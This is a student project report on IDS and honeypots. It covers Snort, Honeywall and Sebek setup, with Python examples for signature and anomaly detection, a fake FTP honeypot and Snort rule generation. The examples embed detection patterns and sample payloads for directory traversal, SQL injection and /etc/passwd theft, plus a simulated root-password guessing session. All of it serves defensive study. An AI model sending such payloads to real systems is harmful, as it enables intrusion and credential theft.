
Project 2: Signature generation for an intrusion detection system

Hong Th Bch Dng, Hunh Quang Sang. Supervisor: Ths.Mai Xun Ph
ACKNOWLEDGEMENTS
First of all, we sincerely thank Mr. Mai Xun Ph for his dedicated guidance, his feedback and for providing the reference material we needed to complete this project as well as possible.
We also thank the Industrial University of Ho Chi Minh City and the lecturers of the Faculty of Information Technology for preparing course material and books, and for creating the best possible environment for us to learn, exchange ideas, consult references and find the information needed to carry out our project.
Shortcomings are unavoidable, and our group hopes to receive comments from all lecturers and friends so that we can do better in future projects.

We sincerely thank you!

Ho Chi Minh City, 21 November 2013
The student group










COMMENTS OF THE SUPERVISOR

Ho Chi Minh City, ... 2013
Supervisor

Ths.Mai Xun Ph

COMMENTS OF THE REVIEWER

Ho Chi Minh City, ... 2013
Reviewer

Ths.Nguyn Ha

WORK ASSIGNMENT

Hunh Quang Sang:
- Study IDS in detail
- Study the Snort application
- Deploy, install and operate the NIDS
- Study the signature generation mechanism
- Build the signature generation system for the IDS

Hong Th Bch Dng:
- Study honeypots in detail
- Study the Honeywall, Sebek and related applications
- Deploy, install and operate the Honeynet
- Study the signature generation mechanism
- Build the signature generation system for the IDS













OVERVIEW
System security is a field that currently receives a great deal of attention, not only within agencies, companies and enterprises but worldwide. Alongside the benefits of the rapid development of information technology, the risk of attacks intended to sabotage systems, intrude into networks to steal information, or alter data for malicious purposes persists and keeps growing. According to statistics from CERT (Computer Emergency Response Team), the number of attacks rises every year: around 200 incidents in 1989, 400 in 1991, 1,330 in 1994, and 8,064 vulnerabilities discovered in 2006 (35% more than in 2005), a trend expected to continue. In Vietnam, from the beginning of 2013 to the time of writing about 2,405 websites of agencies and businesses were compromised; most notably, in July a series of major online newspapers (Tuoi Tre, VietNamNet, Dan Tri and others) were hit by distributed denial-of-service (DDoS) attacks that left many of them congested or briefly paralysed.
Deploying a security system with good protection mechanisms, one that can avoid attacks and sabotage and keep information safe, is therefore really necessary in today's technology era.
There are many ways to defend computer systems against attackers, such as firewalls or encrypting information. However, when an attacker takes over a computer system and uses it as a tool to attack other computers, or when an attack originates from inside the local network, a firewall can neither detect nor stop it. In these cases an IDS is considered the best solution, because an IDS can detect attacks whether they originate inside or outside the local network. Combining an IDS with a honeypot system is also regarded as a highly effective solution that can both detect attacks and trace the perpetrator: a honeypot, placed next to the real system to lure attackers into a decoy, collects attack techniques and information about the attacker and records logs. Combined with the IDS, the logs captured by the honeypot are added to the IDS signature list; from those signatures the IDS can then detect destructive attacks and carry out its monitoring, alerting and protection functions, keeping the network safe, minimising the incidents that could occur and helping the system develop stably in the long term.
To better understand the concepts, functions, collection steps, operating mechanisms and signature generation of honeypots and IDS, our group researched and carried out the project "Signature generation for an intrusion detection system" with:
Objectives:
- Master IDS, understand how an IDS works and how signatures are generated.
- Understand the concept, classification, functions and operating steps of a honeypot system.
- Deploy a honeypot system and build a system that generates signatures for the IDS from the honeypot's logs.
Research method:
- The group mainly searched for material in books, papers and on the Internet.
- Consulted lecturers and friends.
- Studied the English-language material provided by the lecturers.
Research subjects:
- Honeypot and IDS systems
- The Snort, Honeywall and Sebek applications
The report consists of 4 chapters:
Chapter I: Overview of IDS
Chapter II: Overview of honeypots
Chapter III: Deploying the NIDS and Honeynet
Chapter IV: Building the signature generation system for the IDS
Chapter I: Overview of IDS
Many methods are currently applied and developed to secure computer networks, such as firewalls and encryption. An IDS (intrusion detection system) is another of these methods: it helps avoid attacks by hackers by monitoring computer resources and raising alerts about abnormal activity or unfamiliar patterns.
For a clearer understanding, in this chapter the group presents the concept of an IDS, its operating mechanism and basic functions, as well as the significance and importance of an IDS for network security.
1. Introduction to IDS:
a. Concept:
An Intrusion Detection System (IDS) is a system that monitors and collects information about traffic on the network. It automatically tracks the events occurring in the computer system, analyses them to detect suspicious security problems, and notifies the administrator.
An IDS detects attacks from known attack signatures, or by comparing current network traffic with the system's normal traffic to find anomalies, and raises an alert so that the administrator can block the attacking connections. An IDS can also tell whether an attack originates inside the local network or from outside (a hacker).
b. Functions:
An IDS has the following basic functions:
- Monitor network traffic and suspicious actions.
- Provide the administrator with information about the attack or intrusion, such as the attack method and the tools used.
- Alert the system and the administrator when suspicious actions are being carried out against the system.
- Detect destructive attacks from known signatures, or by comparing current network throughput with the previously observed normal throughput.
- Distinguish whether an attack comes from outside or from inside the local network.
- Serve legitimate users' requests for information and keep illegitimate users out, using the default settings and the administrator's configuration to resist intruders and saboteurs. (Strictly speaking, blocking is the job of the firewall or an IPS that the IDS triggers; a pure IDS only detects and alerts.)
2. Basic components of an IDS:
An IDS has three basic components: information (packet) collection, packet analysis (detection) and response.

[Figure: basic components of an IDS]

- Information collection: this component examines the packets travelling on the network. The NIC is put into promiscuous mode, so every packet passing through it is recorded and processed, then passed on to the analysis component.
- Detection: this is the most important component of an IDS. Here attacks, or packets carrying malicious code, are detected by the system's intrusion detection methods, either anomaly-based or signature-based.
- Response: when there are signs of an intrusion or destructive attack, the detection component signals the attack to the response component. The response component then activates the attack-blocking function on the firewall and notifies the administrator so that countermeasures can be taken in time.
3. Classification of IDS:
There are two types of IDS, Host-Based IDS (HIDS) and Network-Based IDS (NIDS):
a. Network-Based IDS:
A Network-Based IDS, or NIDS, can be a hardware appliance or a piece of software installed to monitor activity and track all of the data exchanged on a network segment containing many hosts.
A NIDS inspects packets, scanning their headers, and can examine packet payloads to detect dangerous code or different kinds of attack.
In a NIDS the sensors are placed at specific, critical points so that traffic across the whole network can be monitored and packets analysed to detect attacks, which keeps the cost relatively low. However, when network traffic is high the sensor may be unable to keep up and drop packets. A NIDS also cannot analyse encrypted traffic such as SSH or SSL.

[Figure: placement of a NIDS]

In the figure, the blue device is where the NIDS is installed; it sits between the external Internet and the internal network, and a single NIDS can monitor every computer in the network.
b. Host-Based IDS:
A Host-Based IDS, or HIDS, is software installed on one particular machine. Instead of monitoring activity across the whole network like a NIDS, a HIDS monitors only the activity, traffic and log files of one host, detecting attacks aimed directly at that specific host.
A HIDS can analyse traffic that is encrypted on the wire, because it sees the data after the host has decrypted it. Because it can be installed on many kinds of machine (servers, workstations, etc.), a HIDS is more flexible than a NIDS.
When a packet reaches the host it is analysed and forwarded if it contains no malicious code. However, a HIDS is more expensive than a NIDS, since it must be set up on every host to be monitored, and management, updating and configuration become harder. Being installed on the host, a HIDS depends on that machine's operating system. A HIDS detects attacks mainly from the information stored in log files.
Many HIDS products are designed for Windows hosts, although HIDS exist for Unix-like systems as well.

[Figure: hosts with a HIDS installed]

The yellow devices in the figure are the hosts on which a HIDS is installed.
4. How an IDS works:
An IDS has many functions, but its two main ones are detecting attacks and generating alerts that warn the system or the administrator about them.
To decide whether an activity is normal or intended to attack or sabotage the system, an IDS relies on two main methods, anomaly-based and signature-based:
a. Anomaly-based:
In this method a profile of the system's normal activity is established and compared with the system's current state. When the current state differs from the normal state, an intrusion is assumed.
For example, the computers in the network normally operate and send and receive data from 7 a.m. to 5 p.m.; if a computer is active at 8 p.m. and sending or receiving data, that is a sign of abnormal behaviour and the probability that it is under attack is high.
This method lets the system detect previously unknown kinds of attack. To work accurately, an IDS using it must monitor the system during normal operation and collect statistics about its activity as the baseline for detecting later anomalies. The price is a higher false-positive rate: legitimate but unusual behaviour (an after-hours backup, for instance) deviates from the profile just as an attack does.
b. Signature-based:
A signature contains the information needed to describe a previously known type of attack.
With this method, packets entering the system are compared with the signatures stored in the IDS database; if one matches, the IDS raises an alert to the administrator.
Signature-based intrusion detection systems are currently very widely used, because they are easy to develop and produce accurate alerts. However, a signature must be added to the IDS database for every attack and every variant of it, so the database grows very large.
This method requires maintaining a database of intrusion signatures, and that database must be updated regularly whenever a new form or technique of intrusion appears.
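The following is an added example, not code from the report or from Snort, that runs both detection methods of this section over a handful of constructed log records: a signature list matched against packet payloads, and a per-host profile of normal hours and payload sizes learned from a baseline day. The host addresses, the signatures and the traffic are all made up for the demonstration; the point is that the two methods catch different events, and that the anomaly method also flags an after-hours request that may be perfectly legitimate.

```python
# Added example (not from the original report): the two detection methods above,
# run over constructed log records. Nothing here is Snort's own code.
from dataclasses import dataclass
from datetime import datetime
import re


@dataclass
class Event:
    """One record as an IDS sensor would log it (constructed for this example)."""
    ts: datetime
    src: str
    dst: str
    payload: bytes


# --- Signature-based: each signature describes one already-known attack. ---
SIGNATURES = [
    ("Directory traversal in HTTP request", re.compile(rb"\.\./\.\./")),
    ("SQL injection tautology", re.compile(rb"(?i)'\s*or\s*'1'\s*=\s*'1")),
    ("Sensitive file /etc/passwd requested", re.compile(rb"/etc/passwd")),
]


def signature_alerts(events):
    """Compare every payload against the signature list; any match is an alert."""
    alerts = []
    for e in events:
        for name, pattern in SIGNATURES:
            if pattern.search(e.payload):
                alerts.append((e.ts.isoformat(), e.src, name))
    return alerts


# --- Anomaly-based: learn a profile of normal activity, then flag deviations. ---
def build_profile(training):
    """Per source host: the hours at which it was active and its largest payload."""
    profile = {}
    for e in training:
        p = profile.setdefault(e.src, {"hours": set(), "max_bytes": 0})
        p["hours"].add(e.ts.hour)
        p["max_bytes"] = max(p["max_bytes"], len(e.payload))
    return profile


def anomaly_alerts(profile, events, slack=2.0):
    """Flag hosts never seen before, activity outside the learned hours,
    and payloads far larger than anything in the baseline."""
    alerts = []
    for e in events:
        p = profile.get(e.src)
        if p is None:
            alerts.append((e.ts.isoformat(), e.src, "unknown host"))
        elif e.ts.hour not in p["hours"]:
            alerts.append((e.ts.isoformat(), e.src, "activity outside learned hours"))
        elif len(e.payload) > slack * p["max_bytes"]:
            alerts.append((e.ts.isoformat(), e.src, "payload size far above baseline"))
    return alerts


# Constructed traffic: a baseline day for host 10.0.0.5 (activity 07:00-16:00),
# then a test day mixing a known attack, an after-hours access and an unknown host.
TRAINING = [
    Event(datetime(2013, 11, 4, h, 0), "10.0.0.5", "10.0.0.20", b"GET /index.html HTTP/1.1\r\n")
    for h in (7, 9, 10, 11, 12, 14, 16)
]
TEST = [
    # Known attack in normal hours: only the signature method sees it.
    Event(datetime(2013, 11, 5, 10, 15), "10.0.0.5", "10.0.0.20", b"GET /../../etc/passwd HTTP/1.1\r\n"),
    # Harmless-looking request at 20:05: only the anomaly method sees it
    # (it may well be a legitimate after-hours backup, i.e. a false positive).
    Event(datetime(2013, 11, 5, 20, 5), "10.0.0.5", "10.0.0.20", b"GET /report.html HTTP/1.1\r\n"),
    # New host sending an SQL injection: both methods fire, for different reasons.
    Event(datetime(2013, 11, 5, 10, 30), "192.0.2.9", "10.0.0.20", b"GET /login?user=a' or '1'='1 HTTP/1.1\r\n"),
    # Perfectly normal request: no alert from either method.
    Event(datetime(2013, 11, 5, 11, 0), "10.0.0.5", "10.0.0.20", b"GET /index.html HTTP/1.1\r\n"),
]

if __name__ == "__main__":
    for a in signature_alerts(TEST):
        print("SIGNATURE", *a)
    for a in anomaly_alerts(build_profile(TRAINING), TEST):
        print("ANOMALY  ", *a)
```

Run on the constructed data, the signature method reports the traversal request (twice, once per matching signature) and the SQL injection, while the anomaly method reports the 20:05 request and the unknown host but says nothing about the traversal, which happened inside normal hours with a normal-sized payload. A real deployment would run both and let the signature hits confirm or dismiss the anomaly hits.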






Chapter II: Overview of honeypots
Honeypots are a relatively new technology in computer network security. Their task is to imitate a real system, observe hackers' attacks and keep system resources safe; honeypots are regarded as one of the most effective trap systems.
In this chapter the group presents basic knowledge about the concept, classification, purpose and significance of honeypots, as well as their functions, role and placement in the system, and outlines the honeynet, a high-interaction form of honeypot, in the task of securing the network.
1. Concept, role and significance of honeypots:
a. Concept:
According to the source the group cites [1], the term honeypot was first mentioned on 4 August 1999 in the paper "To Build a Honeypot" by Lance Spitzner, one of the founders of the Honeynet Project, which introduced the idea of building a honeynet to study hackers' attack techniques and thus take timely countermeasures. (Decoy systems of this kind had been described before 1999; the date above is the one given by the cited source.)
Literally, a honeypot can be understood as a pot of honey used as an insect trap. In the network security context, a honeypot is an information-resource system that can imitate any resource server, such as a mail server, FTP server, DNS server or web server, that is, the services hackers are interested in, in order to attract their attention so that they attack this decoy system instead of the real one.
b. Role and significance:
When a hacker attacks the honeypot's decoy system, the honeypot observes the attack, records logs and triggers its alerting functions. The goal of a honeypot is to monitor and examine the hacker's activity after they gain control of the machines in the honeypot, in order to record the traces of their intrusion and decode their attack methods and techniques. The more closely the honeypot resembles the real system, the easier it is to deceive the hacker.
A honeypot is a copy of a real system, but with deliberately built-in security holes, and usually containing seemingly valuable information such as bank accounts or stock information, to attract attackers and make them concentrate on attacking this decoy. The honeypot interacts directly with the hacker and extracts the necessary information about them, keeps them away from the real system, and so protects the real system from the dangers hackers pose.
c. Advantages and disadvantages of honeypots:
Advantages:
- A honeypot only holds information about malicious or suspicious actions, so the amount of information it collects is small but of high value and easy to analyse.
- Because a honeypot does not monitor and capture large amounts of activity, it usually does not run into resource exhaustion.
- A honeypot only monitors activity aimed at itself, so it does not need large amounts of memory or disk.
- Honeypots are a simple technology, easy to configure and use, with few failures or misconfigurations. They capture only suspicious actions and do not care what is interacting with them, so they work well in encrypted or IPv6 environments.
Disadvantages:
- The biggest drawback of honeypots is their very narrow field of view: a honeypot only sees and captures activity directed against itself. If the hacker attacks other systems, the honeypot will not monitor or capture those attacks.
- A honeypot risks being identified by the hacker as a decoy. The hacker may then deliberately feed it false information for it to study, so that the honeypot draws wrong conclusions about the hacker, and from there the hacker can attack the real system and damage other systems.
Because of these drawbacks, honeypots cannot replace other security mechanisms such as firewalls and intrusion detection systems. Instead, a honeypot records logs from which information about the hacker can easily be found and used as evidence in legal proceedings. In addition, the honeypot absorbs the hacker's attacks in place of the real system, keeping the real system safe.
2. Placement of honeypots:
There are three main zones in which a honeypot can be placed:
a. External placement:
The external zone lies in front of the firewall, outside the internal network. No firewall separates the honeypot from the external Internet, so the risk is usually higher than in the other positions.
b. Internal placement:
The honeypot sits inside the internal network, separated from the Internet by the firewall. This is the best position for a honeypot to give early warning of any exploitation activity from outside into the network, protect the internal network and capture threats. The internal zone is a trusted zone; the honeypot must be isolated all the more carefully there, since a compromised internal honeypot gives the attacker a foothold inside the trusted network.
c. DMZ placement:
The DMZ (demilitarized zone) is separate from the internal network, and placing honeypots in the DMZ is the option companies usually choose. The DMZ contains the services that can be accessed from outside (with restrictions). The honeypot can be placed alongside the servers (mail server, web server, etc.) in the DMZ to give early warning of threats to that location. The DMZ can use public or private IP addresses. However, a honeypot in the DMZ is not the best position for early warning of an attack that damages the internal network. The DMZ is a semi-trusted zone.
Comparison of honeypot placements:

Position | Advantages                                              | Disadvantages
External | Easy to build and deploy.                               | Poor data control; high risk.
Internal | Good for monitoring the internal network; early warning | Complex installation.
         | system.                                                 |
DMZ      | Good data control.                                      | Complex installation; weak early warning;
         |                                                         | hard to protect the internal network.
3. Classification:
Honeypots are divided into two types:
Low-interaction: a low-interaction honeypot does not provide real services, applications or operating systems for the hacker to interact with. The services, applications and operating system are only emulated, so data collection is limited in scope and in the services offered; on the other hand, such honeypots are easy to deploy and maintain, and the risk is low because their design is simple and their functions are kept to the most basic level. Some low-interaction honeypots:
- BackOfficer Friendly: usually called BOF. This is one of the simplest honeypots to use, designed to run on most Windows or Linux systems but mainly deployed on Windows. Installation is very simple, configuration is easy and maintenance is low. However, BOF can only detect and alert on attacks against 7 ports corresponding to 7 services (FTP port 21, SMTP port 25, HTTP port 80, POP3 port 110, Telnet port 23, IMAP port 143, Back Orifice UDP port 31337). BOF cannot be logged into remotely and has no customisation or configuration features.
- Specter: like BOF, Specter is a low-interaction honeypot, but with more features than BOF, including alerting and logging. It can emulate up to 14 ports. It is easy to deploy, simple to maintain and low-risk. Specter is limited in the amount of information it can collect compared with high-interaction honeypots. Besides emulating various services, Specter can emulate 13 different operating systems, which gives flexibility in identifying threats against different operating systems. Specter cannot listen on or monitor a port owned by another application; for example, if a web server is running on the same computer, Specter cannot monitor port 80.
- Honeyd: Honeyd is an open-source low-interaction honeypot whose purpose is to detect, capture and alert on suspicious activity. It claims IP addresses that do not actually exist, and when a hacker tries to attack one of these addresses, Honeyd uses the non-existent IP to interact with the attacker and collect information; Honeyd can monitor up to millions of unused IP addresses for connections. It can listen on all UDP and TCP ports and gives full access to its source code. Honeyd can emulate many different operating systems at once (473 operating systems, according to the authors). Designed for Unix platforms, Honeyd is relatively easy to install and configure via its command-line interface. However, Honeyd cannot provide a real operating system for the hacker to interact with, and it has no built-in alerting of its own when an intrusion is detected (it logs, and alerting must be built on top of its logs).
High-interaction: at this level the honeypot is installed with, and runs, real services, applications and operating systems, exactly like a normal working network. This type collects more data and information than a low-interaction honeypot, but the risk is also higher (since real applications, operating systems and services are run, configuration and deployment are very complex and design errors are easy to make); deployment and maintenance are complex and time-consuming. The honeynet is the characteristic form of this interaction level.
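As an added example of what "emulated service" means for the low-interaction honeypots listed above (this is not the code of BOF, Specter or Honeyd, nor the report's own), the block below fakes an FTP server only as far as needed to keep an attacker talking and record what they try. The banner and the attacker's session are constructed; no real FTP daemon is involved and no login can ever succeed, which is exactly why this kind of honeypot is low-risk and also why it captures little beyond the first few commands.

```python
# Added example (not from the original report, and not the code of BOF, Specter or
# Honeyd): a low-interaction emulation of one service. The FTP dialogue is faked only
# far enough to keep an attacker talking and record what they try; there is no real
# FTP daemon behind it and no login is ever granted. Banner and session are constructed.


class FakeFtpService:
    BANNER = "220 ProFTPD 1.3.3 Server ready.\r\n"   # claimed, not real, software

    def __init__(self):
        self.pending_user = None
        self.attempts = []    # (user, password) pairs the attacker tried
        self.commands = []    # every raw command line, kept for later analysis

    def handle(self, line):
        """Reply to one client command the way the real protocol would."""
        self.commands.append(line)
        verb, _, arg = line.strip().partition(" ")
        verb = verb.upper()
        if verb == "USER":
            self.pending_user = arg
            return "331 Password required for %s\r\n" % arg
        if verb == "PASS":
            # Record the credential guess; refuse regardless of what was sent.
            self.attempts.append((self.pending_user, arg))
            self.pending_user = None
            return "530 Login incorrect.\r\n"
        if verb == "SYST":
            return "215 UNIX Type: L8\r\n"
        if verb == "QUIT":
            return "221 Goodbye.\r\n"
        # Everything else (RETR, STOR, SITE EXEC, ...) needs a login we never grant,
        # so the emulation stays shallow and the attacker gets nothing to exploit.
        return "530 Please login with USER and PASS.\r\n"


def run_session(client_lines):
    """Drive one attacker session; returns the service (with what it captured)
    and the full two-sided transcript as (side, text) pairs."""
    svc = FakeFtpService()
    transcript = [("S", svc.BANNER)]
    for line in client_lines:
        transcript.append(("C", line))
        transcript.append(("S", svc.handle(line)))
    return svc, transcript


# Constructed attacker session: a credential-guessing run followed by a file fetch.
SESSION = ["USER anonymous", "PASS guest@", "USER root", "PASS toor",
           "RETR /etc/passwd", "QUIT"]

if __name__ == "__main__":
    service, transcript = run_session(SESSION)
    for side, text in transcript:
        print(side, text.rstrip())
    print("captured credentials:", service.attempts)
```

The captured credential pairs and the raw command list are the whole yield of such a honeypot; a high-interaction system such as the honeynet of Chapter III would instead let the attacker actually log in and then record everything they do afterwards.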

Chapter III: Building the Honeynet and NIDS
From the overviews in Chapters I and II we know that a honeynet is a high-interaction honeypot and that a NIDS (network-based IDS) is the kind of IDS that mainly monitors the traffic entering and leaving the network. What do these two systems need deployed and configured, and how? And what is the goal of building the honeynet and the NIDS? In this chapter the group describes in more detail the working architecture, deployment, installation and operation of the honeynet and of Snort: the configuration of Sebek and the Honeywall for the honeynet, and the configuration of rules and creation of the database for Snort for the NIDS, so that attackers can be countered and the network and the data in it protected as effectively as possible.
1. The Honeynet system
A honeynet is a high-interaction honeypot: by running real applications, services and operating systems it collects more data, but the risk is also relatively high, since design, deployment and configuration are very complex.
The purposes of building a honeynet are:
- To collect the techniques, attack methods and tools that hackers use.
- To help detect early the vulnerabilities present in the real system so that they can be fixed in time, and at the same time to test the security of the network and its services (web, DNS, mail, etc.) and the safety, reliability and quality of other IT products (especially operating systems such as Unix, Linux and Windows).
- To collect information about and traces of the hacker (the IP address used for the attack, the hacker's location, the time of the attack, etc.) so that the perpetrator can be traced.
1.1 Honeynet architecture:
1.1.1. Physical architecture:
a. First-generation honeynet (GenI):
The first honeynet appeared in 1999 and is called GenI.
A GenI honeynet is a network placed separately from the real network to keep that system safe. It consists of honeypots separated from the external Internet by a firewall; all traffic into and out of the honeynet must pass through this firewall.
The firewall and the intrusion detection system (IDS) are two separate systems.

[Figure: physical architecture of the first-generation honeynet (GenI)]

The firewall controls the traffic entering and leaving the system and uses rules (deny, allow) to steer the hacker into attacking the honeynet rather than the real network.
The main purpose of this generation is to capture the hacker's actions. The amount of information the honeynet collects is relatively large, and it can detect attacks as well as the technologies the hacker uses.
b. Second- and third-generation honeynets (GenII, GenIII):
The second generation of honeynet appeared in 2001; GenIII appeared at the end of 2004.
Unlike the first generation, in the GenII and GenIII models the firewall and the IDS are no longer independent but are combined into a single gateway called the Honeywall, which performs both data control and data capture.

[Figure: physical architecture of the GenII/GenIII honeynet]

In the figure, the Honeywall has three network cards: eth0 connects to the external Internet (the side the hacker comes from) and has no IP address; eth1 connects to the network containing the honeypots and also has no IP address. The Honeywall bridges these two interfaces at layer 2, which is why the hacker finds it hard to notice that they are interacting with a decoy honeynet. The third card, eth2, is the management interface and is the only one with an address (its configuration is described in section 1.3 below).
c. Virtual honeynet:
A virtual honeynet is a newer physical architecture that works like the second and third generations, with the aim of reducing the cost of the honeynet and simplifying its management by using tools such as VMware and User Mode Linux to create many virtual machines on one physical host.
VMware can run several different operating systems at once, but only on the Intel x86 architecture. User Mode Linux (UML) is an open-source solution with the same capability of creating virtual machines on a physical host, but it is normally used only for Linux guests.
Today the virtual honeynet is the most widely used of the physical models listed above.
1.1.2. Logical architecture:
The way a honeynet works is expressed through three main functions:
- Data control: responsible for controlling the data entering and leaving the honeynet, controlling the hacker's activity, and preventing the hacker from using the honeynet to attack or harm other systems. For this task the honeynet uses two main tools, the iptables firewall and the Snort IDS.
- Data capture: responsible for collecting information and for monitoring and recording the attacker's behaviour inside the honeynet. For this task the honeynet uses the Sebek client/server tool.
- Data analysis: supports analysis of the collected data in order to determine the hacker's techniques, tools and goals, and from that to take timely countermeasures. The honeynet uses the Walleye and Hflow tools for this task.
How the honeynet operates:
Incoming traffic is controlled by the honeynet using the iptables rule policies (the iptables firewall holds rules defining which accesses into and out of the system are allowed or denied, and controls the traffic passing through the Honeywall). In addition, to define attack signatures, the honeynet relies on the rule policies of the Snort IDS (presented in a later section).
Next, the honeynet uses the Sebek client/server tool to capture the data entering the system and stores everything captured in a database.
Finally, the system uses tools such as Walleye and Hflow to analyse the data collected in the database and determine whether the honeynet is under attack and which attack method and tools are being used. The result is then turned into Snort rules, which serve as attack signatures for the honeynet the next time.
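The last step of the workflow above, turning what the analysis stage flagged into Snort rules, is shown here as an added example; it is neither the report's own generation system nor any Honeywall component. It assumes the analysis stage hands over records as (protocol, destination port, raw payload, label), with label None for traffic it judged harmless; it uses the HTTP request line as the content match, escapes the characters Snort treats specially inside a content string, collapses repeated captures of the same attack into one rule, and numbers rules from 1000001 because Snort reserves SIDs below 1,000,000 for its official rule sets. All captured records are constructed.

```python
# Added example (not the report's own code, and not the Honeywall's): the last step
# of the workflow above, turning requests captured on the honeypot into Snort rules.
# Assumptions: the analysis step hands over records as (protocol, destination port,
# raw payload, label), where label is None for traffic it judged harmless; the HTTP
# request line is used as the content match; SIDs start at 1000001 because Snort
# reserves SIDs below 1,000,000 for its official rule sets. All records are constructed.

SPECIAL = b';"\\'   # must be backslash-escaped inside a Snort content: string


def snort_content(data):
    """Render bytes as a Snort content: string: printable bytes literally (with
    ; " and backslash escaped), everything else, including |, as a |hex| run."""
    out, hexrun = [], []

    def flush():
        if hexrun:
            out.append("|" + " ".join("%02X" % b for b in hexrun) + "|")
            hexrun.clear()

    for b in data:
        if 0x20 <= b < 0x7F and b != 0x7C:      # printable ASCII other than '|'
            flush()
            out.append(("\\" if b in SPECIAL else "") + chr(b))
        else:
            hexrun.append(b)
    flush()
    return "".join(out)


def request_line(payload):
    """First line of the HTTP request, up to the first CRLF."""
    return payload.split(b"\r\n", 1)[0]


def generate_rules(records, first_sid=1000001):
    """One rule per distinct flagged request line; repeated captures share a rule."""
    rules, seen, sid = [], set(), first_sid
    for proto, port, payload, label in records:
        if label is None:
            continue                          # analysis did not flag it
        content = snort_content(request_line(payload))
        if content in seen:
            continue                          # same attack seen again
        seen.add(content)
        classtype = "web-application-attack" if port == 80 else "misc-attack"
        rules.append(
            'alert %s $EXTERNAL_NET any -> $HOME_NET %d (msg:"HONEYPOT %s"; '
            'flow:to_server,established; content:"%s"; nocase; '
            'classtype:%s; sid:%d; rev:1;)'
            % (proto, port, label, content, classtype, sid))
        sid += 1
    return rules


# Constructed captures: two traversal attempts (one duplicate), one benign request
# the analysis stage left unlabelled, and one SQL injection containing a ';'.
CAPTURED = [
    ("tcp", 80, b"GET /../../../etc/passwd HTTP/1.1\r\nHost: 10.0.0.20\r\n\r\n", "directory traversal"),
    ("tcp", 80, b"GET /index.html HTTP/1.1\r\nHost: 10.0.0.20\r\n\r\n", None),
    ("tcp", 80, b"GET /../../../etc/passwd HTTP/1.1\r\nHost: 203.0.113.5\r\n\r\n", "directory traversal"),
    ("tcp", 80, b"GET /login?user=a' or '1'='1;-- HTTP/1.1\r\nHost: 10.0.0.20\r\n\r\n", "SQL injection"),
]

if __name__ == "__main__":
    print("\n".join(generate_rules(CAPTURED)))
```

The generated lines are meant to be appended to the sensor's local.rules file; before reloading, `snort -T -c <snort.conf>` checks that every rule parses, which is where an unescaped `;` or `"` in a content string would otherwise surface. Matching on the whole request line is deliberately narrow: it catches exact replays of what the honeypot saw and misses trivial variants, which is the trade-off of signatures discussed in Chapter I.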
1.2 Detailed network model for the system:
1.3 Deploying, installing and operating the Honeynet:
a. Configuring the Honeywall:
When building a honeynet the most important element is the Honeywall: all traffic into or out of the honeypots must pass through it.
The Honeywall acts as a gateway between the external Internet and the honeypot network, so configuring it is the most important step in setting up the honeynet. The basic configuration consists of:
- Enter the honeypot IP address; the default is 10.0.0.20 (with several honeypots, enter each one's IP separated by spaces). These are the addresses the hacker will attack.
- Enter the broadcast address of the honeypot network for the IP above.
- Next, configure the IP of interface eth2 (the management interface). Here the group uses 10.10.10.66 for the management interface.
- Enter the subnet mask for the management interface IP.
- Enter the default gateway for the management interface (the group entered 10.10.10.66).
- Enter the domain name, if any, for the management interface (eth2: 10.10.10.66).
- Enter the IP address of the DNS server for the local domain.
- The next step sets up remote management of the honeypots over SSH. By default sshd listens on TCP port 22. Choose Yes/No to have sshd start, or not start, automatically at boot.
- Enter the restricted list of ports allowed for remote management connections; normally only two ports are allowed, 22 for SSH and 443 for the web interface.
- To be able to analyse data, enable Walleye. Enter the list of TCP ports that are allowed to connect outbound.
- Enter the list of UDP ports that are allowed to connect outbound.
- Set the time scale of the outbound connection limit for UDP, TCP, ICMP and other protocols. Here the group set the scale to "hour".
- Set the TCP connection limit to 20.
Thus, within one hour the attacker can make 20 outbound TCP connections. Once the limit is reached, no further connections can be made; after the hour the counter is reset and connections are possible again. The same applies to UDP and the other protocols.
The Honeywall also has a filtering feature that filters different packets, providing data control.
- Set the path to the blacklist file (/etc/blacklist.txt); the blacklist contains the IPs that will be blocked.
- Likewise set the path to the whitelist file (/etc/whitelist.txt).
- To allow the honeypots in the honeynet unrestricted access to DNS servers, choose Yes.
Sebek is a data-capture tool: it records all activity on the honeypot and sends the data to the server. Sebek needs the following configured:
- The destination IP address for Sebek packets.
- The destination UDP port for Sebek packets; the default is 1101.
Logging in to the management interface: on the management workstation, enter in a web browser the address configured for the management interface (eth2), https://10.10.10.66. The login page appears; log in as the user roo. After a successful login the honeywall can be managed and the collected data viewed and analysed.
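As an added illustration of the data-control settings above (not code from this report or from the Honeywall distribution), the following Python models how the honeywall decides on an outbound connection from a honeypot: blacklist first, then whitelist, then the unrestricted-DNS exception, then a per-protocol budget that is reset every hour. The figure of 20 TCP connections per hour comes from the configuration above; the other limits, the rule order, the fixed one-hour window and the sample addresses are this example's assumptions.

```python
"""Model of Honeywall-style data control for outbound honeypot traffic.

Added example: it reproduces the decisions described in the report
(blacklist, whitelist, unrestricted DNS, per-protocol hourly connection
limits) as a stand-alone simulation. It is not code from the Honeywall
distribution; the rule order and the fixed one-hour window are assumptions.
"""
from dataclasses import dataclass, field
from ipaddress import ip_address, ip_network

WINDOW_SECONDS = 3600   # the group chose "Hour" as the limit scale
# tcp=20 is the report's setting; the other limits are assumed for the example
DEFAULT_LIMITS = {"tcp": 20, "udp": 20, "icmp": 50, "other": 10}


@dataclass
class Decision:
    verdict: str   # "allow", "drop" (filtered) or "limit" (budget exhausted)
    reason: str


@dataclass
class HoneywallControl:
    honeypots: set                 # addresses entered as honeypot IPs
    blacklist: list                # networks from /etc/blacklist.txt
    whitelist: list                # networks from /etc/whitelist.txt
    dns_servers: set = field(default_factory=set)   # used when DNS is unrestricted
    limits: dict = field(default_factory=lambda: dict(DEFAULT_LIMITS))
    _buckets: dict = field(default_factory=dict)    # (honeypot, proto) -> (window_start, count)

    @staticmethod
    def _in_list(ip, nets):
        addr = ip_address(ip)
        return any(addr in ip_network(n) for n in nets)

    def outbound(self, ts, src, dst, proto, dport=None):
        """Decide one outbound connection attempt made at time ts (seconds)."""
        proto = proto if proto in self.limits else "other"
        if src not in self.honeypots:
            return Decision("drop", "source is not a registered honeypot")
        if self._in_list(dst, self.blacklist):
            return Decision("drop", "destination is blacklisted")
        if self._in_list(dst, self.whitelist):
            return Decision("allow", "destination is whitelisted")
        if dst in self.dns_servers and proto == "udp" and dport == 53:
            return Decision("allow", "unrestricted DNS")
        start, count = self._buckets.get((src, proto), (ts, 0))
        if ts - start >= WINDOW_SECONDS:          # the hour has elapsed: counter starts over
            start, count = ts, 0
        if count >= self.limits[proto]:
            self._buckets[(src, proto)] = (start, count)
            return Decision("limit", f"{proto} budget of {self.limits[proto]} per hour exhausted")
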